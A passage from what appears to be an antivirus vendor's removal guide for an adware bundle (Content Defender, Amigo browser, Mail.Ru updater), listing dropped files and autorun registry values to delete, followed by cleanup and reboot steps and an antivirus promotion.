    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\cd.exe (41084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\cd.exe (34724 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
    %Program Files%\Content Defender\nss\certutil.exe (601 bytes)
    %Program Files%\Content Defender\nss\plc4.dll (20 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
    %Program Files%\Content Defender\ConDefSetup.exe (41656 bytes)
    %Program Files%\Content Defender\condefclean.exe (601 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\cd.exe (5381 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
    %Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
    %Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
    %Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
    %Program Files%\Content Defender\cd.exe (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\1.tmp (935 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mg.exe (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\VisualElementsManifest.xml (396 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\el.pak (1747 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\UnityWebPlayer.exe (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\PepperFlash\manifest.json (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\natives_blob.bin (1677 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Интернет.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\PepperFlash\pepflashplayer.dll (122658 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\MailRuUpdater.exe (39945 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\en-GB.pak (212 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\libegl.dll (81 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\hu.pak (272 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\pt-BR.pak (249 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\uk.pak (1689 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\am.pak (1639 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\VisualElements\splash-620x300.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fa.pak (1648 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ro.pak (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\id.pak (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\resources.pak (142877 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\es-419.pak (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ms.pak (234 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sk.pak (266 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\44.4.2403.3.manifest (248 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
    %Documents and Settings%\%current user%\Desktop\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\VisualElements\smalllogo.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\mr.pak (1801 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ml.pak (3735 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sl.pak (241 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mailruupdater.exe (38588 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mg.exe (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\he.pak (296 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_elf.dll (132 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\th.pak (1789 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\secondarytile.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\metro_driver.dll (1763 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe (7345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\amigo.exe (3765 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\pt-PT.pak (254 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\pl.pak (253 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\tr.pak (254 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fi.pak (242 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\xinput1_3.dll (81 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Extensions\external_extensions.json (103 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\wow_helper.exe (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\en-US.pak (212 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\da.pak (234 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ta.pak (3682 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\nacl64.exe (12289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\kn.pak (3669 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\icudtl.dat (75554 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\nb.pak (233 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\vk.exe (167 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\gu.pak (1796 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\zh-CN.pak (211 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\amigo_cr.exe (1615 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\lt.pak (257 bytes)
    %Documents and Settings%\%current user%\Desktop\Интернет.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\et.pak (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mm.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\chrome.7z (1266233 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_200_percent.pak (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_100_percent.pak (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\ok.exe (142 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\nacl_irt_x86_64.nexe (22433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\cs.pak (258 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\hi.pak (1810 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\zh-TW.pak (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\hr.pak (244 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\nacl_irt_x86_32.nexe (17629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\snapshot_blob.bin (1717 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sw.pak (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ko.pak (263 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\nl.pak (247 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Интернет.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\VisualElements\logo.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\te.pak (1863 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\bn.pak (1830 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\de.pak (256 bytes)
    %Documents and Settings%\%current user%\Desktop\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\libexif.dll (310 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_watcher.dll (1636 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ru.pak (1675 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\mm.exe (130 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ja.pak (308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\vi.pak (287 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\d3dcompiler_47.dll (22433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fr.pak (276 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\it.pak (252 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\amigo_resources.pak (28502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ca.pak (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\bg.pak (1705 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\libglesv2.dll (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sr.pak (1670 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\unitywebplayer.exe (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome.dll (237340 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\delegate_execute.exe (3707 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\sv.pak (235 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\es.pak (263 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\fil.pak (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\ar.pak (1629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\chrome_child.dll (307964 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1932_25419\Chrome-bin\44.4.2403.3\Locales\lv.pak (262 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "amigo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe --no-startup-window"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 3 (2 votes)

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now